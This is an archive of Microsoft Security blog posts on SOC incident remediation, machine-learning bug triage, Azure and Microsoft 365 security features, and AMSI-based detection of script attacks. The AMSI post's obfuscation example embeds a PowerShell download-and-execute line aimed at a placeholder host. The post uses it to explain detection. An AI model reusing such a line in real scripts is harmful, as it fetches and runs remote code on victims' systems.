Archive for the ‘Cloud Computing’ Category

Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2

May 5th, 2020

This is the sixth blog in the Lessons learned from the Microsoft SOC series designed to share our approach and experience from the front lines of our security operations center (SOC) protecting Microsoft and our Detection and Response Team (DART) helping our customers with their incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

COVID-19 and the SOC

Before we conclude the day in the life, we thought we would share an analyst’s eye view of the impact of COVID-19. Our analysts are mostly working from home now and our cloud-based tooling approach enabled this transition to go pretty smoothly. The differences in attacks we have seen are mostly in the early stages of an attack with phishing lures designed to exploit emotions related to the current pandemic and increased focus on home firewalls and routers (using techniques like RDP brute-forcing attempts and DNS poisoning—more here). The attack techniques they attempt to employ after that are fairly consistent with what they were doing before.

A day in the life—remediation

When we last left our heroes in the previous entry, our analyst had built a timeline of the potential adversary attack operation. Of course, knowing what happened doesn’t actually stop the adversary or reduce organizational risk, so let’s remediate this attack!

  1. Decide and act—As the analyst develops a high enough level of confidence that they understand the story and scope of the attack, they quickly shift to planning and executing cleanup actions. While this appears as a separate step in this particular description, our analysts often execute on cleanup operations as they find them.

Big Bang or clean as you go?

Depending on the nature and scope of the attack, analysts may clean up attacker artifacts as they go (emails, hosts, identities) or they may build a list of compromised resources to clean up all at once (Big Bang).

  • Clean as you go—For most typical incidents that are detected early in the attack operation, analysts quickly clean up the artifacts as we find them. This rapidly puts the adversary at a disadvantage and prevents them from moving forward with the next stage of their attack.
  • Prepare for a Big Bang—This approach is appropriate for a scenario where an adversary has already “settled in” and established redundant access mechanisms to the environment (frequently seen in incidents investigated by our Detection and Response Team (DART) at customers). In this case, analysts should avoid tipping off the adversary until all attacker presence has been fully discovered, as surprise can help with fully disrupting their operation. We have learned that partial remediation often tips off an adversary, which gives them a chance to react and rapidly make the incident worse (spread further, change access methods to evade detection, inflict damage/destruction for revenge, cover their tracks, etc.). Note that cleaning up phishing and malicious emails can often be done without tipping off the adversary, but cleaning up host malware and reclaiming control of accounts has a high chance of doing so.

These are not easy decisions to make, and we have found no substitute for experience in making these judgment calls. The collaborative work environment and culture we have built in our SOC helps immensely, as our analysts can tap into each other’s experience to help make these tough calls.

The specific response steps are very dependent on the nature of the attack, but the most common procedures used by our analysts include:

  • Client endpoints—SOC analysts can isolate a computer and contact the user directly (or IT operations/helpdesk) to have them initiate a reinstallation procedure.
  • Server or applications—SOC analysts typically work with IT operations and/or application owners to arrange rapid remediation of these resources.
  • User accounts—We typically reclaim control of these by disabling the account and resetting the password for compromised accounts (though these procedures are evolving as many of our users are passwordless, using Windows Hello or another form of MFA). Our analysts also explicitly expire all authentication tokens for the user with Microsoft Cloud App Security.
    Analysts also review the multi-factor phone number and device enrollment to ensure it hasn’t been hijacked (often contacting the user), and reset this information as needed.
  • Service Accounts—Because of the high risk of service/business impact, SOC analysts work with the service account owner of record (falling back on IT operations as needed) to arrange rapid remediation of these resources.
  • Emails—The attack/phishing emails are deleted (and sometimes purged to prevent recovery of deleted emails), but we always save a copy of the original email in the case notes for later search and analysis (headers, content, scripts/attachments, etc.).
  • Other—Custom actions can also be executed based on the nature of the attack such as revoking application tokens, reconfiguring servers and services, and more.

Automation and integration for the win

It’s hard to overstate the value of integrated tools and process automation, as these bring so many benefits—improving the analysts’ daily experience and improving the SOC’s ability to reduce organizational risk.

  • Analysts spend less time on each incident, limiting the attacker’s time to operate—measured by mean time to remediate (MTTR).
  • Analysts aren’t bogged down in manual administrative tasks so they can react quickly to new detections (reducing mean time to acknowledge—MTTA).
  • Analysts have more time to engage in proactive activities that both reduce organization risk and increase morale by keeping them focused on the mission.
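As a rough illustration, both metrics reduce to timestamp arithmetic over incident records; the field names and values below are hypothetical:

```python
from datetime import datetime

# Hypothetical incident records with creation, acknowledgement, and remediation times.
incidents = [
    {"created": datetime(2020, 5, 1, 9, 0),
     "acknowledged": datetime(2020, 5, 1, 9, 12),
     "remediated": datetime(2020, 5, 1, 11, 30)},
    {"created": datetime(2020, 5, 2, 14, 0),
     "acknowledged": datetime(2020, 5, 2, 14, 5),
     "remediated": datetime(2020, 5, 2, 16, 0)},
]

def mean_minutes(deltas):
    """Average a list of timedeltas, expressed in minutes."""
    return sum(d.total_seconds() for d in deltas) / len(deltas) / 60

# MTTA: creation to acknowledgement. MTTR: acknowledgement to remediated closure.
mtta = mean_minutes([i["acknowledged"] - i["created"] for i in incidents])
mttr = mean_minutes([i["remediated"] - i["acknowledged"] for i in incidents])
print(f"MTTA: {mtta:.1f} min, MTTR: {mttr:.1f} min")
```

Where exactly each clock starts and stops varies by SOC; the point is that both numbers come directly from case timestamps, so better tooling that shaves minutes off each step shows up in the metrics immediately.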

Our SOC has a long history of developing its own automation and scripts, built by a dedicated automation team, to make analysts’ lives easier. Because custom automation requires ongoing maintenance and support, we are constantly looking for ways to shift automation and integration to capabilities provided by Microsoft engineering teams (which also benefits our customers). While still early in this journey, this approach typically improves the analyst experience and reduces maintenance effort and challenges.

This is a complex topic that could fill many blogs, but it takes two main forms:

  • Integrated toolsets save analysts manual effort during incidents by allowing them to easily navigate multiple tools and datasets. Our SOC relies heavily on the integration of Microsoft Threat Protection (MTP) tools for this experience, which also saves the automation team from writing and supporting custom integration for this.
  • Automation and orchestration capabilities reduce manual analyst work by automating repetitive tasks and orchestrating actions between different tools. Our SOC currently relies on an advanced custom SOAR platform and is actively working with our engineering teams (MTP’s AutoIR capability and Azure Sentinel SOAR) on how to shift our learnings and workload onto those capabilities.

After the attacker operation has been fully disrupted, the analyst marks the case as remediated, which is the timestamp signaling the end of MTTR measurement (which started when the analyst began the active investigation in step 2 of the previous blog).

While having a security incident is bad, having the same incident repeated multiple times is much worse.

  2. Post-incident cleanup—Because lessons aren’t actually “learned” unless they change future actions, our analysts always integrate any useful information learned from the investigation back into our systems. Analysts capture these learnings so that we avoid repeating manual work in the future and can rapidly see connections between past and future incidents by the same threat actors. This can take a number of forms, but common procedures include:
    • Indicators of Compromise (IoCs)—Our analysts record any applicable IoCs such as file hashes, malicious IP addresses, and email attributes into our threat intelligence systems so that our SOC (and all customers) can benefit from these learnings.
    • Unknown or unpatched vulnerabilities—Our analysts can initiate processes to ensure that missing security patches are applied, misconfigurations are corrected, and vendors (including Microsoft) are informed of “zero day” vulnerabilities so that they can create security patches for them.
    • Internal actions such as enabling logging on assets and adding or changing security controls. 
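As a minimal sketch of what capturing IoCs could look like in code (the record shape and the in-memory store are hypothetical, not our actual threat intelligence system):

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

@dataclass
class Ioc:
    """One indicator of compromise captured from a closed case."""
    kind: str       # e.g. "sha256", "ip", "email_sender"
    value: str
    case_id: str
    recorded_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))

# Hypothetical in-memory store; a real SOC writes to a shared TI platform.
ti_store: list = []

def record_ioc(kind: str, value: str, case_id: str) -> Ioc:
    ioc = Ioc(kind, value, case_id)
    ti_store.append(ioc)
    return ioc

# Illustrative indicators from a closed case.
record_ioc("ip", "203.0.113.7", "CASE-1042")
record_ioc("email_sender", "payroll@example.invalid", "CASE-1042")
print(len(ti_store))
```

The value of this step is the shared store: tagging each indicator with its case ID is what lets future investigations surface connections to past incidents by the same actor.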

Continuous improvement

So the adversary has now been kicked out of the environment and their current operation poses no further risk. Is this the end? Will they retire and open a cupcake bakery or auto repair shop? Not likely after just one failure, but we can consistently disrupt their successes by increasing the cost of attack and reducing the return, which will deter more and more attacks over time. For now, we must assume that adversaries will try to learn from what happened on this attack and try again with fresh ideas and tools.

Because of this, our analysts also focus on learning from each incident to improve their skills, processes, and tooling. This continuous improvement occurs through many informal and formal processes ranging from formal case reviews to casual conversations where they tell the stories of incidents and interesting observations.

As caseload allows, the investigation team also hunts proactively for adversaries when they are not on shift, which helps them stay sharp and grow their skills.

This closes our virtual shift visit for the investigation team. Join us next time as we shift to our Threat hunting team (a.k.a. Tier 3) and get some hard-won advice and lessons learned.

…until then, share and enjoy!

P.S. If you are looking for more information on the SOC and other cybersecurity topics, check out previous entries in the series (Part 1 | Part 2a | Part 2b | Part 3a | Part 3b), Mark’s List, and our new security documentation site. Be sure to bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to Mark on LinkedIn or Twitter.

The post Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2 appeared first on Microsoft Security.

Secure the software development lifecycle with machine learning

April 16th, 2020

Every day, software developers stare down a long list of features and bugs that need to be addressed. Security professionals try to help by using automated tools to prioritize security bugs, but too often, engineers waste time on false positives or miss a critical security vulnerability that has been misclassified. To tackle this problem, data science and security teams came together to explore how machine learning could help. We discovered that by pairing machine learning models with security experts, we can significantly improve the identification and classification of security bugs.

At Microsoft, 47,000 developers generate nearly 30,000 bugs a month. These items get stored across over 100 Azure DevOps and GitHub repositories. To better label and prioritize bugs at that scale, we couldn’t just apply more people to the problem. However, large volumes of semi-curated data are perfect for machine learning. Since 2001, Microsoft has collected 13 million work items and bugs. We used that data to develop a process and machine learning model that correctly distinguishes between security and non-security bugs 99 percent of the time and accurately identifies the critical, high-priority security bugs 97 percent of the time. This is an overview of how we did it.

Qualifying data for supervised learning

Our goal was to build a machine learning system that classifies bugs as security/non-security and critical/non-critical with a level of accuracy that is as close as possible to that of a security expert. To accomplish this, we needed a high volume of good data. In supervised learning, machine learning models learn how to classify data from pre-labeled data. We planned to feed our model lots of bugs that are labeled security and others that aren’t labeled security. Once the model was trained, it would be able to use what it learned to label data that was not pre-classified. To confirm that we had the right data to effectively train the model, we answered four questions:

  • Is there enough data? Not only do we need a high volume of data, we also need data that is general enough and not fitted to a small number of examples.
  • How good is the data? If the data is noisy, it means we can’t trust that every pair of data and label is teaching the model the truth. However, data from the wild is likely to be imperfect. We looked for systemic problems rather than trying to get it perfect.
  • Are there data usage restrictions? Are there reasons, such as privacy regulations, that we can’t use the data?
  • Can data be generated in a lab? If we can generate data in a lab or some other simulated environment, we can overcome other issues with the data.

Our evaluation gave us confidence that we had enough good data to design the process and build the model.

Data science + security subject matter expertise

Our classification system needs to perform like a security expert, which means the subject matter expert is as important to the process as the data scientist. To meet our goal, security experts approved training data before we fed it to the machine learning model. We used statistical sampling to provide the security experts with a manageable amount of data to review. Once the model was working, we brought the security experts back in to evaluate the model in production.
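A minimal sketch of drawing such a review sample, assuming a flat list of bug IDs (the corpus and batch size here are hypothetical):

```python
import random

random.seed(7)  # fixed seed so review batches are reproducible

# Hypothetical corpus of pre-labeled bug IDs awaiting expert approval.
bug_ids = [f"BUG-{i}" for i in range(10_000)]

# Draw a simple random sample small enough for experts to review by hand.
review_batch = random.sample(bug_ids, k=200)
print(len(review_batch))
```

Because the sample is random rather than hand-picked, the experts' verdict on the batch generalizes to the whole labeled corpus, which is what makes a 200-item review a meaningful check on 10,000 labels.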

With a process defined, we could design the model. To classify bugs accurately, we used a two-step machine learning model operation. First, the model learned how to classify security and non-security bugs. In the second step, the model applied severity labels—critical, important, low-impact—to the security bugs.
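A minimal sketch of such a two-step setup, using scikit-learn on bug titles (the tiny dataset and model choice are illustrative, not Microsoft's production pipeline):

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Toy pre-labeled bug titles; the real system trains on millions of work items.
titles = [
    "Buffer overflow in parser", "XSS in login page", "SQL injection in search",
    "Button misaligned on settings page", "Typo in error message", "Crash when file missing",
]
is_security = [1, 1, 1, 0, 0, 0]

# Step one: learn to separate security from non-security bugs.
step1 = make_pipeline(TfidfVectorizer(), LogisticRegression())
step1.fit(titles, is_security)

# Step two: learn severity labels, trained only on the security bugs.
sec_titles = titles[:3]
severity = ["critical", "critical", "important"]
step2 = make_pipeline(TfidfVectorizer(), LogisticRegression())
step2.fit(sec_titles, severity)

# A new bug only gets a severity label if step one flags it as security.
new_bug = "Possible buffer overflow in image parser"
if step1.predict([new_bug])[0] == 1:
    print("security bug, severity:", step2.predict([new_bug])[0])
```

Training the severity model only on bugs already labeled as security keeps each step's job narrow, which mirrors the two-step operation described above.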

Our approach in action

Building an accurate model is an iterative process that requires strong collaboration between subject matter experts and data scientists:

Data collection: The project starts with data science. We identify all the data types and sources and evaluate their quality.

Data curation and approval: Once the data scientist has identified viable data, the security expert reviews the data and confirms the labels are correct.

Modeling and evaluation: Data scientists select a data modeling technique, train the model, and evaluate model performance.

Evaluation of model in production: Security experts evaluate the model in production by monitoring the average number of bugs and manually reviewing a random sampling of bugs.

The process didn’t end once we had a model that worked. To make sure our bug modeling system keeps pace with the ever-evolving products at Microsoft, we conduct automated re-training. The data is still approved by a security expert before the model is retrained, and we continuously monitor the number of bugs generated in production.

More to come

By applying machine learning to our data, we accurately classify which work items are security bugs 99 percent of the time. The model is also 97 percent accurate at labeling critical and non-critical security bugs. This level of accuracy gives us confidence that we are catching more security vulnerabilities before they are exploited.

In the coming months, we will open source our methodology on GitHub.

In the meantime, you can read a published academic paper, Identifying security bug reports based solely on report titles and noisy data, for more details. Or download a short paper that was featured at Grace Hopper Celebration 2019.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. To learn more about our Security solutions, visit our website.

The post Secure the software development lifecycle with machine learning appeared first on Microsoft Security.

Enable remote work while keeping cloud deployments secure

April 9th, 2020

As our customers shift to remote work in response to the COVID-19 outbreak, many have asked how to maintain the security posture of their cloud assets. Azure Security Center security controls can help you monitor your security posture as usage of cloud assets increases. Here are three common scenarios:

  1. Enable multi-factor authentication (MFA) to enhance identity protection.
  2. Use just-in-time (JIT) VM access for users that need remote access via RDP or SSH to servers that are in your Azure infrastructure.
  3. Review the “Remediate vulnerabilities” control in Azure Security Center to identify critical security updates needed by workloads (servers, containers, databases) that will be accessed remotely.

Read Keeping your cloud deployments secure during challenging times for detailed instructions.

The post Enable remote work while keeping cloud deployments secure appeared first on Microsoft Security.

Categories: Azure Security, Cloud Computing

Voice of the Customer: Walmart embraces the cloud with Azure Active Directory

October 22nd, 2018

Today’s post was written by Sue Bohn, partner director of Program Management, and Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart.


I’m Sue Bohn, partner director of Program Management at Microsoft. I’m an insatiable, lifelong learner, and I lead the Customer & Partner Success team for the Identity Division. I’m jazzed to introduce the Voice of the Customer blog series. In this series, the best of our customers will present their deployment stories to help you learn how you can get the most out of Azure Active Directory (Azure AD). Today we’ll hear from Walmart. I love the convenience of Walmart; where else can you buy tires, socks, and orange juice in one trip?

Walmart teamed up with Microsoft to digitally transform its operations, empower associates with easy-to-use technology, and make shopping faster and easier for millions of customers around the world. But this strategic partnership didn’t just happen overnight. In the beginning, Walmart’s cybersecurity team was skeptical about the security of the public cloud and Azure AD. Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart, share their team’s journey working with Microsoft to embrace the cloud with Azure AD:

Working closely with our Microsoft account team convinced us we could safely write back to on-premises and enable password hash sync

In the beginning, we were willing to feed to the cloud but at that time were not comfortable allowing the syncing of passwords to the cloud or write-back to on-premises from the cloud. We were skeptical of the security controls. We involved Microsoft in the strategy and planning phases of our initiatives and made slow but steady progress. As we worked with the Microsoft team, representatives were eager to get any and all feedback and to provide it to their product groups. This led to our critical Azure AD enhancement requests being received, and solutions were delivered. When we ran into bugs, we were able to troubleshoot issues with the very people who wrote the application code. Our Microsoft account team was right there with us, in the trenches, and they were committed to making sure we were confident in Azure AD’s capabilities. Over time, as we learned more about Azure AD and the new security features we were enabling, our trust in Microsoft’s Azure AD security capabilities grew and many of our security concerns were alleviated.

Given our scale, validating and verifying the security capabilities of Azure AD was key to empowering our users while still protecting the enterprise. Walmart currently has over 2.5 million Azure AD users enrolled, and with that many users we need very granular controls to adequately protect our assets. The entire team, including Microsoft, rolled up our sleeves to figure out how to make it work, and together we’ve enabled several features that let us apply custom security policies. Azure Information Protection (AIP), an amazing solution that is only possible with Azure AD, allows us to classify and label documents and emails to better protect our data. Azure AD Privileged Identity Management (PIM) gives us more visibility and control over admins. Azure AD dynamic groups let us automatically enable app access for our users. This is a huge time saver in an environment with over half a million groups. With all of the work we did with Microsoft and our internal security team, we were able to turn on the two features we previously did not think we would be able to: password hash sync and write-back from cloud to on-premises. This was critical to our journey, as we had never allowed a cloud solution to feed back into our core environment in this manner.

Driving down help desk calls with self-service password reset

One example that shows how much we trust the security of Azure AD and the cloud is self-service password reset (SSPR). The biggest driver of help desk calls at Walmart is people who get locked out of their accounts because of a forgotten password. It wastes a tremendous amount of our help desk’s time and frustrates associates who lose time sitting on the phone. We believed that letting users reset their passwords and unlock their accounts without help desk involvement would go a long way toward improving productivity, but we had always been nervous about giving people who weren’t on Walmart PCs that kind of access. Another hurdle was ensuring that our hourly associates were only able to utilize this service while they were clocked in for work. Microsoft helped us solve this with the implementation of custom controls.

Our Microsoft team supported us the entire way, and we’re proud to say that SSPR is being rolled out. When we started this journey, we would never have believed that we would allow people to reset their passwords from a public interface, but here we are, and the user experience is great!

Engage Microsoft early

If there is one thing we would have done differently, it would be to engage Microsoft at a deeper level earlier in the process. Our public cloud adoption didn’t really take off until we brought them in and spent time with their backend product engineering teams. Microsoft’s commitment to improving security and the cloud is clear. Their work to safeguard data has continuously improved, and as we work more closely with them, they continue to incorporate our feedback into future feature releases. It is this relationship that has allowed us to securely implement Azure AD at our scale.

We look forward to sharing our next big success: implementation of Azure AD B2B.

Voice of the Customer: looking ahead

Many thanks to Ben and Gerald for sharing their journey from on-premises to Azure AD. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers’ security and implementation insights more broadly. Bookmark the Microsoft Secure blog so you don’t miss part 2 in this series. Our next customer will speak to how Azure AD and implementing cloud Identity and Access Management make them more secure.

The post Voice of the Customer: Walmart embraces the cloud with Azure Active Directory appeared first on Microsoft Secure.

Categories: Cloud Computing, cybersecurity

Secure file storage

October 16th, 2018


This is a blog series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, you’ll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Collaborate Securely, the fifth blog in our eight-blog series on deploying intelligent security scenarios.

Employees are often tasked with preparing documents that require them to gather expertise from various people, often both internal and external to their organization. This common practice can expose your company data at unsecured points along the way. To mitigate risk, Microsoft 365 has simplified and secured the process of sharing files so that employees can easily gather data, expert opinions, edits, and responses from only the right people in a single document.


How can I centrally store information so it’s discoverable by colleagues but not anyone else?

To answer this question, let’s start with storage first, then move to search.

Store securely

To help your employees easily discover relevant data for their projects and keep that data internal and secure, you can build a team site in SharePoint Online. If your employees need to make their notes or informal insights discoverable, but keep the information secure, deploy OneNote and have employees password-protect their notes.

You can deploy OneNote through Microsoft Intune to your Intune-managed employee devices, or have your employees sign in with their Microsoft Azure-provisioned ID and download OneNote to their devices. The owner of the SharePoint library, list, or survey can change permissions to let the right people access the data they need while restricting others. You can also empower your employees to build and maintain their own SharePoint Online team with security safeguards that you have established.

Search securely

Once you’ve set up your team site, SharePoint Intelligent Search and Discovery allows both you and your employees to discover and organize relevant information from other employees’ work files across Microsoft 365. It keeps your organization’s documents discoverable only within your protected cloud, according to each user’s permission settings. You can also set permissions so your employees will see only documents that you have already given them access to.


How do I make use of automation to ensure that employees have the correct permissions?

By enabling a dynamic group in Azure Active Directory (Azure AD), you will ensure that users can be automatically assigned to groups according to attributes that you define. For example, if users move to a new department, when their department name changes in Azure AD, rules will automatically assign them to new security groups defined for their new department. By using these Azure AD-based advanced rules that enable complex, attribute-based, dynamic memberships for groups, you can protect organizational data on several levels.
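For example, an Azure AD dynamic membership rule is an attribute expression like the following (the attribute values here are illustrative):

```
(user.department -eq "Finance") -and (user.accountEnabled -eq true)
```

When a user’s department attribute changes, Azure AD re-evaluates the rule and adds or removes the user from the group automatically, with no help desk ticket required.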


Deployment tips from our experts

  • Make information discoverable and secure. Help your employees easily discover relevant data for their projects. Start by building a team site in SharePoint Online. Store notes securely in Microsoft OneNote, and ensure employees discover relevant information across Office 365 with SharePoint Intelligent Search and Discovery.
  • Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether you’re planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.


Want to learn more?

For more information and guidance on this topic, check out the white paper Empower people to discover, share, and edit files and information securely. You can find additional security resources on

Coming Soon! Share files easily and securely is the seventh installment of our “Deploying Intelligent Scenarios” series. In November, we will kick off a new series: “Top 10 Security Deployment Actions with Microsoft 365 Security.”


More blog posts from this series

The post Secure file storage appeared first on Microsoft Secure.

Categories: Cloud Computing

Enable your users to work securely from anywhere, anytime, across all of their devices

July 18th, 2018


This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 Security solutions. In this series, you’ll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Assessing Microsoft 365 Security solutions using the NIST Cybersecurity Framework.

Your users expect technology to help them be productive, yet you need to keep your organization’s data safe. This blog will show you how Microsoft 365 Security solutions can help you achieve this fine balance between productivity and security. We recommend an integrated solution that incorporates managing identities, managing devices, and then securing applications, email, and data.

First, we’ll start with the question that we often hear from customers: How can I make sure my employees are working securely when they are working remotely? With digital technology changing how people work, users need to be productive on a variety of devices, regardless of whether they are company-provided or bring your own device (BYOD). The vital foundation of your defense-in-depth security strategy is strong, integrated identity protection.

Securing identities to protect at the front door

Identity management in Azure Active Directory (Azure AD) is your first step. Once user identities are managed in Azure AD, you can enable Azure AD single sign-on (SSO) to manage authentication across devices, cloud apps, and on-premises apps. Then layer on multi-factor authentication (MFA) with Azure AD Conditional Access (see Figure 1). These security tools work together to reauthenticate high-risk users and take automated action to secure your network.

Figure 1. Set user policies using Azure AD Conditional Access.

Security across devices

From identity, we move to devices. Microsoft Intune lets you manage both company-owned and BYOD devices from the cloud. Once you set up your Intune subscription, you can add users and groups, assign licenses, deploy and protect apps, and set up device enrollment.

Through Azure AD, you can then create conditional access policies according to user, device, application, and risk.

To strengthen employee sign-in on Windows 10 PCs, Windows Hello for Business replaces passwords with strong MFA consisting of a user credential and biometric or PIN.

Security across apps

Microsoft Cloud App Security gives you visibility and control over the cloud apps that your employees are using. You can see the overall picture of cloud apps across your network, including any unsanctioned apps your employees may be using. Discovering shadow IT apps can help you prevent unmonitored avenues into or out of your network.

Security across email

Once you have secured your organization’s devices and applications, it’s equally important to safeguard your organization’s flow of information. Sending and receiving email is one of the weakest spots for IT security. Azure Information Protection allows you to configure policies to classify, label, and protect data based on sensitivity. Then you can track activities on shared data and revoke user access if necessary.

For security against malicious emails, Office 365 Advanced Threat Protection (ATP) lets you set up anti-phishing protections to protect your employees from increasingly sophisticated phishing attacks.

Security across data

Once you have secured how employees access data, it’s equally important to safeguard the data itself. Microsoft BitLocker Drive Encryption technology prevents others from accessing your disk drives and flash drives without authorization, even if they’re lost or stolen. Windows Information Protection helps protect against accidental data leaks, with protection and policies that travel with the data wherever it goes.

Deployment tips from our experts

Now that you know more about how Microsoft 365 security solutions can protect your people and data in a mobile world, here are three proven tips to put it all into action:

  1. Be proactive, not reactive. Proactively provision identities through Azure AD, enroll devices through Microsoft Intune, and set up Intune App Protection. Enrolling devices can help keep your company’s data safe by preventing threats or data breaches before they happen.
  2. Keep your company data safe. Managing employee identities is a fundamental part of information security. Enable SSO and MFA, set up conditional access policies, and then deploy Azure Information Protection for classification and protection of sensitive data.
  3. Plan for success with Microsoft FastTrack. This valuable service comes with your subscription at no additional charge. Whether you’re planning your initial rollout, onboarding your product, or driving user adoption, FastTrack is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, stay tuned for the white paper Work securely from anywhere, anytime, across all your devices coming soon!


Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that ‘live off the land’

December 4th, 2017 No comments

Scripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.

Scripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the land: staying away from the disk and using common tools to run code directly in memory. Often part of the operating system, scripting engines can evaluate and execute content from the internet on the fly. Furthermore, integration with popular apps makes them effective vehicles for delivering malicious implants through social engineering, as evidenced by the increasing use of scripts in spam campaigns.

Malicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShell, the de facto scripting standard for administrative tasks on Windows, with the ability to invoke system APIs and access a variety of system classes and objects.

While the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.
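The layering problem is easy to see in a small sketch (Python as a stand-in for a real script host; the base64 wrapping and the payload string are invented stand-ins for real obfuscation): static inspection of the outer blob reveals nothing, while peeling the layers, as runtime inspection effectively does, exposes the inner content.

```python
import base64

def obfuscate(payload: str, layers: int) -> str:
    # Stand-in for real script obfuscation: wrap the payload in N base64 layers.
    for _ in range(layers):
        payload = base64.b64encode(payload.encode()).decode()
    return payload

def peel(blob: str, max_layers: int = 10):
    # Decode layers until the content stops being valid base64; return the
    # innermost content and how many layers were removed (the layer count is
    # itself a useful signal).
    layers = 0
    while layers < max_layers:
        try:
            blob = base64.b64decode(blob, validate=True).decode()
        except (ValueError, UnicodeDecodeError):
            break
        layers += 1
    return blob, layers

blob = obfuscate("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')", 3)
inner, depth = peel(blob)
print(depth, inner[:3])  # 3 IEX
```

Real obfuscators mix string reversal, character-code arrays, and environment lookups, so peeling them statically is rarely this easy; that is why instrumenting the interpreter itself, as described below, matters.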

Windows 10 provides optics into script behavior through Antimalware Scan Interface (AMSI), a generic, open interface that enables Windows Defender Antivirus to look at script contents the same way script interpreters do: in a form that is both unencrypted and unobfuscated. In Windows 10 Fall Creators Update, with knowledge from years analyzing script-based malware, we’ve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.

This unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection (Windows Defender ATP). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.

In this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP machine learning systems make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.

KRYPTON: Highlighting the resilience of script-based attacks

Traditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.

Apart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.

For example, the activity group KRYPTON has been observed hijacking or creating scheduled tasks; they often target system tasks found in exclusion lists of popular forensic tools like Autoruns for Windows. KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.

To illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by John Lambert and the Office 365 Advanced Threat Protection team.

Figure 1. KRYPTON lure document

To live off the land, KRYPTON doesn’t drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (wscript.exe) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.
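A toy version of this pattern (Python for illustration; RC4 shown because the source names it, while the key and payload strings are invented) makes the evasion obvious: the artifact on disk is inert ciphertext until the key, held only in the scheduled task’s arguments, is supplied.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Standard RC4 key scheduling plus PRGA; encryption and decryption are identical.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

payload_on_disk = rc4(b"task-arg-key", b"<decrypted script body>")
# The file alone reveals nothing; only the scheduled task supplies the key:
assert rc4(b"task-arg-key", payload_on_disk) == b"<decrypted script body>"
assert rc4(b"wrong-key", payload_on_disk) != b"<decrypted script body>"
```

A scanner that sees only `payload_on_disk` has nothing to emulate, which is why capturing the decrypted content at invocation time is the reliable choke point.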

Figure 2. KRYPTON script execution chain through wscript.exe

Exposing actual script behavior with AMSI

AMSI overcomes KRYPTON’s evasion mechanisms by capturing JavaScript API calls after they have been decrypted and are ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.

Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

By checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.

